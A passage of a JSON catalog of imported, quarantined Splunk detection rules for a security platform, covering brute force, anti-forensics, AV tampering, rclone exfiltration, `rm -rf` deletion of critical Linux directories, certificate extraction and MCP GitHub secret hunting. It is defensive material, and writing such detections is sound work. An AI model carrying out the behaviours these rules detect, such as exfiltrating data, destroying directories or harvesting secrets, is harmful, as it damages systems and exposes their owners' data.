this flag is occasionally used during software development or testing, it is rarely seen in normal user activity. Threat actors often abuse this setting to disable Chrome's built-in security sandbox, making it easier to execute malicious code or escape browser isolation. This behavior is commonly observed in malware droppers or loaders that embed Chromium components for command and control, credential theft, or UI spoofing. Analysts should investigate such events, especially if they originate from unusual parent processes (e.g., powershell.exe, cmd.exe, or unknown binaries), or if accompanied by other indicators such as file drops, process injection, or outbound network activity. Filtering by command-line arguments and process ancestry can help reduce false positives and surface high-fidelity detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-browser-no-security-sandbox-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "314cb263-7eeb-4d45-b693-bb21699c73d2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_browser_no_security_sandbox_process.yml" } }, { "id": "splunk-security-content-31641378-2fa9-42b1-948e-25e281cb98f7", "type": "detection", "name": "O365 High Number Of Failed Authentications for User", "description": "The following analytic identifies an O365 account experiencing more than 20 failed authentication attempts within 5 minutes. It uses O365 Unified Audit Logs, specifically \"UserLoginFailed\" events, to monitor and flag accounts exceeding this threshold. This activity is significant as it may indicate a brute force attack or password guessing attempt. If confirmed malicious, an attacker could gain unauthorized access to the O365 environment, potentially compromising sensitive emails, documents, and other data. Prompt investigation and action are crucial to prevent unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-high-number-of-failed-authentications-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31641378-2fa9-42b1-948e-25e281cb98f7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_high_number_of_failed_authentications_for_user.yml" } }, { "id": "splunk-security-content-31702fc0-2682-11ec-85c3-acde48001122", "type": "detection", "name": "Sdelete Application Execution", "description": "The following analytic detects the execution of the sdelete.exe application, a Sysinternals tool often used by adversaries to securely delete files and remove forensic evidence from a targeted host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. Monitoring this activity is crucial as sdelete.exe is not commonly used in regular operations and its presence may indicate an attempt to cover malicious activities. If confirmed malicious, this could lead to the loss of critical forensic data, hindering incident response and investigation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sdelete-application-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31702fc0-2682-11ec-85c3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sdelete_application_execution.yml" } }, { "id": "splunk-security-content-31810b7a-0abe-42be-a210-0dec8106afee", "type": "detection", "name": "Linux Auditd Kernel Module Using Rmmod Utility", "description": "The following analytic detects suspicious use of the `rmmod` utility for kernel module removal, which may indicate an attacker attempt to unload critical or security-related kernel modules. The `rmmod` command is used to remove modules from the Linux kernel, and unauthorized use can be a tactic to disable security features, conceal malicious activities, or disrupt system operations. By monitoring for unusual or unauthorized `rmmod` activity, this analytic helps identify potential tampering with kernel modules, enabling security teams to take proactive measures to protect system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-kernel-module-using-rmmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31810b7a-0abe-42be-a210-0dec8106afee", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_kernel_module_using_rmmod_utility.yml" } }, { "id": "splunk-security-content-31a13f43-812e-4752-a6ca-c6c87bf03e83", "type": "detection", "name": "Windows Impair Defenses Disable AV AutoStart via Registry", "description": "The following analytic detects modifications to the registry related to the disabling of autostart functionality for certain antivirus products, such as Kingsoft and Tencent. Malware like ValleyRAT may alter specific registry keys to prevent these security tools from launching automatically at startup, thereby weakening system defenses. By monitoring changes in the registry entries associated with antivirus autostart settings, this detection enables security analysts to identify attempts to disable protective software. Detecting these modifications early is critical for maintaining system integrity and preventing further compromise by malicious actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-av-autostart-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31a13f43-812e-4752-a6ca-c6c87bf03e83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_av_autostart_via_registry.yml" } }, { "id": "splunk-security-content-320099b7-7eb1-4153-a2b4-decb53267de2", "type": "detection", "name": "Windows Rundll32 WebDAV Request", "description": "The following analytic identifies the execution of rundll32.exe with command-line arguments loading davclnt.dll and the davsetcookie function to access a remote WebDAV instance. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt to exploit CVE-2023-23397, a known vulnerability. If confirmed malicious, this could allow an attacker to execute remote code or exfiltrate data, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-webdav-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "320099b7-7eb1-4153-a2b4-decb53267de2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_webdav_request.yml" } }, { "id": "splunk-security-content-326fdf44-b90c-4d2e-adca-1fd140b10536", "type": "detection", "name": "Windows LOLBAS Executed Outside Expected Path", "description": "The following analytic identifies a LOLBAS process being executed outside of it's expected location.\nProcesses being executed outside of expected locations may be an indicator that an adversary is attempting to evade defenses or execute malicious code.\nThe LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-lolbas-executed-outside-expected-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "326fdf44-b90c-4d2e-adca-1fd140b10536", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_lolbas_executed_outside_expected_path.yml" } }, { "id": "splunk-security-content-327fa152-9b56-4e4e-bc0b-2795d4068afa", "type": "detection", "name": "Ollama Abnormal Service Crash Availability Attack", "description": "Detects critical service crashes, fatal errors, and abnormal process terminations in Ollama that may indicate exploitation attempts, resource exhaustion attacks, malicious input triggering unhandled exceptions, or deliberate denial of service attacks designed to disrupt AI model availability and degrade system stability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-abnormal-service-crash-availability-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "327fa152-9b56-4e4e-bc0b-2795d4068afa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_abnormal_service_crash_availability_attack.yml" } }, { "id": "splunk-security-content-32880707-f512-414e-bd7f-204c0c85b758", "type": "detection", "name": "Azure AD Multiple Service Principals Created by User", "description": "The following analytic identifies instances where a single user creates more than three unique OAuth applications within a 10-minute timeframe in Azure AD. It detects this activity by monitoring the 'Add service principal' operation and aggregating data in 10-minute intervals. This behavior is significant as it may indicate an adversary rapidly creating multiple service principals to stage an attack or expand their foothold within the network. If confirmed malicious, this activity could allow attackers to establish persistence, escalate privileges, or access sensitive information within the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-service-principals-created-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "32880707-f512-414e-bd7f-204c0c85b758", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_service_principals_created_by_user.yml" } }, { "id": "splunk-security-content-32e0baea-b3f1-11eb-a2ce-acde48001122", "type": "detection", "name": "Detect RClone Command-Line Usage", "description": "The following analytic detects the usage of `rclone.exe` with specific command-line arguments indicative of file transfer activities. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as `rclone.exe` is often used by adversaries for data exfiltration, especially during ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized data transfer, resulting in data breaches and potential loss of sensitive information. Immediate isolation of the affected endpoint and further investigation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rclone-command-line-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "32e0baea-b3f1-11eb-a2ce-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rclone_command_line_usage.yml" } }, { "id": "splunk-security-content-3348aefd-9ed8-451f-9993-1e9fa04b5530", "type": "detection", "name": "MCP Github Suspicious Operation", "description": "This detection identifies potentially malicious activity through MCP GitHub server connections, monitoring for secret hunting in code searches, organization and repository reconnaissance, branch protection abuse, CI/CD workflow manipulation, sensitive file access, and vulnerability intelligence gathering. These patterns indicate potential supply chain attacks, credential harvesting, or pre-attack reconnaissance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-github-suspicious-operation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3348aefd-9ed8-451f-9993-1e9fa04b5530", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_github_suspicious_operation.yml" } }, { "id": "splunk-security-content-337a46be-600f-11eb-ae93-0242ac130002", "type": "detection", "name": "Certutil exe certificate extraction", "description": "The following analytic identifies the use of certutil.exe with arguments indicating the manipulation or extraction of certificates.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments.\nThis activity is significant because extracting certificates can allow attackers to sign new authentication tokens, particularly in federated environments like Windows ADFS.\nIf confirmed malicious, this could enable attackers to forge authentication tokens, potentially leading to unauthorized access and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/certutil-exe-certificate-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "337a46be-600f-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/certutil_exe_certificate_extraction.yml" } }, { "id": "splunk-security-content-33804986-25dd-43cf-bb6b-dc14956c7cbc", "type": "detection", "name": "Detect Remote Access Software Usage Registry", "description": "The following analytic detects when a known remote access software is added to common persistence locations on a device within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33804986-25dd-43cf-bb6b-dc14956c7cbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_registry.yml" } }, { "id": "splunk-security-content-339155d6-34cb-4788-9d00-e67f190af93a", "type": "detection", "name": "Windows Change File Association Command To Notepad", "description": "The following analytic detects attempts to change the command value of a file association of an extension to open with Notepad.exe.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns and registry modifications.\nThis activity is significant as it can indicate an attempt to manipulate file handling behavior, a technique observed in APT and ransomware attacks like Prestige.\nAfter changing the extension of all encrypted files to a new one, Prestige ransomware modifies the file association for that extension to open with Notepad.exe in order to display a ransom note.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-change-file-association-command-to-notepad.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "339155d6-34cb-4788-9d00-e67f190af93a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_change_file_association_command_to_notepad.yml" } }, { "id": "splunk-security-content-33ae0931-2a03-456b-b1d7-b016c5557fbd", "type": "detection", "name": "ASL AWS New MFA Method Registered For User", "description": "The following analytic identifies the registration of a new Multi-Factor Authentication (MFA) method for an AWS account, as logged through Amazon Security Lake (ASL). It detects this activity by monitoring the `CreateVirtualMFADevice` API operation within ASL logs. This behavior is significant because adversaries who gain unauthorized access to an AWS account may register a new MFA method to maintain persistence. If confirmed malicious, this activity could allow attackers to secure their access, making it harder to detect and remove their presence from the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33ae0931-2a03-456b-b1d7-b016c5557fbd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-33cffee0-41ee-402e-a238-d37825f2d788", "type": "detection", "name": "GitHub Organizations Disable Classic Branch Protection Rule", "description": "The following analytic detects when classic branch protection rules are disabled in GitHub Organizations. The detection monitors GitHub Organizations audit logs for branch protection removal events by tracking actor details, repository information, and associated metadata. For a SOC, identifying disabled branch protection is critical as it could indicate attempts to bypass code review requirements and security controls. Branch protection rules are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-disable-classic-branch-protection-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33cffee0-41ee-402e-a238-d37825f2d788", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_disable_classic_branch_protection_rule.yml" } }, { "id": "splunk-security-content-33f89303-cc6f-49ad-921d-2eaea38a6f7a", "type": "detection", "name": "Linux Deleting Critical Directory Using RM Command", "description": "The following analytic detects the deletion of critical directories on a Linux machine using the `rm` command with argument rf. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions targeting directories like /boot, /var/log, /etc, and /dev. This activity is significant because deleting these directories can severely disrupt system operations and is often associated with destructive campaigns like Industroyer2. If confirmed malicious, this action could lead to system instability, data loss, and potential downtime, making it crucial for immediate investigation and response.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deleting-critical-directory-using-rm-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33f89303-cc6f-49ad-921d-2eaea38a6f7a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deleting_critical_directory_using_rm_command.yml" } }, { "id": "splunk-security-content-33fc9f6f-0ce7-4696-924e-a69ec61a3d57", "type": "detection", "name": "Windows PowerShell IIS Components WebGlobalModule Usage", "description": "The following analytic detects the usage of PowerShell Cmdlets - New-WebGlobalModule, Enable-WebGlobalModule, and Set-WebGlobalModule, which are used to create, enable, or modify IIS Modules. This detection leverages PowerShell Script Block Logging, specifically monitoring EventCode 4104 for these cmdlets. This activity is significant as adversaries may use these lesser-known cmdlets to manipulate IIS configurations, similar to AppCmd.exe, potentially bypassing traditional defenses. If confirmed malicious, this could allow attackers to persist in the environment, manipulate web server behavior, or escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-iis-components-webglobalmodule-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33fc9f6f-0ce7-4696-924e-a69ec61a3d57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_iis_components_webglobalmodule_usage.yml" } }, { "id": "splunk-security-content-3407b250-345a-4d71-80db-c91e555a3ece", "type": "detection", "name": "Zscaler Adware Activities Threat Blocked", "description": "The following analytic identifies potential adware activity blocked by Zscaler. It leverages web proxy logs to detect blocked actions associated with adware threats. Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This activity is significant as adware can degrade system performance, lead to unwanted advertisements, and potentially expose users to further malicious content. If confirmed malicious, it could indicate an attempt to compromise user systems, necessitating further investigation and remediation to prevent potential data breaches or system exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-adware-activities-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3407b250-345a-4d71-80db-c91e555a3ece", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_adware_activities_threat_blocked.yml" } }, { "id": "splunk-security-content-3428ac18-a410-4823-816c-ce697d26f7a8", "type": "detection", "name": "Windows Indirect Command Execution Via pcalua", "description": "The following analytic detects programs initiated by pcalua.exe, the Microsoft Windows Program Compatibility Assistant. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process information. While pcalua.exe can start legitimate programs, it is significant because attackers may use it to bypass command line execution protections. If confirmed malicious, this activity could allow attackers to execute arbitrary commands, potentially leading to unauthorized actions, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indirect-command-execution-via-pcalua.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3428ac18-a410-4823-816c-ce697d26f7a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indirect_command_execution_via_pcalua.yml" } }, { "id": "splunk-security-content-34502357-deb1-499a-8261-ffe144abf561", "type": "detection", "name": "Windows Time Based Evasion", "description": "The following analytic detects potentially malicious processes that initiate a ping delay using an invalid IP address.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"ping 0 -n\".\nMalware like NJRAT was observed using this technique to introduce time delays for evasion tactics, such as delaying self-deletion.\nIf confirmed malicious, this activity could indicate an active infection attempting to evade detection, potentially leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-time-based-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "34502357-deb1-499a-8261-ffe144abf561", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_time_based_evasion.yml" } }, { "id": "splunk-security-content-3451e58a-9457-4985-a600-b616b0cbfda1", "type": "detection", "name": "O365 Multiple OS Vendors Authenticating From User", "description": "The following analytic identifies when multiple operating systems are used to authenticate to Azure/EntraID/Office 365 by the same user account over a short period of time. This activity could be indicative of attackers enumerating various logon capabilities of Azure/EntraID/Office 365 and attempting to discover weaknesses in the organizational MFA or conditional access configurations. Usage of the tools like \"MFASweep\" will trigger this detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-os-vendors-authenticating-from-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3451e58a-9457-4985-a600-b616b0cbfda1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_os_vendors_authenticating_from_user.yml" } }, { "id": "splunk-security-content-345f7e1d-a3fe-4158-abd8-e630f9878323", "type": "detection", "name": "GCP Authentication Failed During MFA Challenge", "description": "The following analytic detects failed authentication attempts during the Multi-Factor Authentication (MFA) challenge on a Google Cloud Platform (GCP) tenant. It uses Google Workspace login failure events to identify instances where MFA methods were challenged but not successfully completed. This activity is significant as it may indicate an adversary attempting to access an account with compromised credentials despite MFA protection. If confirmed malicious, this could lead to unauthorized access attempts, potentially compromising sensitive data and resources within the GCP environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-authentication-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "345f7e1d-a3fe-4158-abd8-e630f9878323", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_authentication_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-347e0892-e8f3-4512-afda-dc0e3fa996f3", "type": "detection", "name": "Windows DNS Gather Network Info", "description": "The following analytic detects the use of the dnscmd.exe command to enumerate DNS records. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. This activity is significant as it may indicate an adversary gathering network information, a common precursor to more targeted attacks. If confirmed malicious, this behavior could enable attackers to map the network, identify critical assets, and plan subsequent actions, potentially leading to data exfiltration or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dns-gather-network-info.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "347e0892-e8f3-4512-afda-dc0e3fa996f3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dns_gather_network_info.yml" } }, { "id": "splunk-security-content-347fd388-da87-11eb-836d-acde48001122", "type": "detection", "name": "Spoolsv Writing a DLL - Sysmon", "description": "The following analytic detects `spoolsv.exe` writing a `.dll` file, which is unusual behavior and may indicate exploitation of vulnerabilities like CVE-2021-34527 (PrintNightmare). This detection leverages Sysmon EventID 11 to monitor file creation events in the `\\spool\\drivers\\x64\\` directory. This activity is significant because `spoolsv.exe` typically does not write DLL files, and such behavior could signify an ongoing attack. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 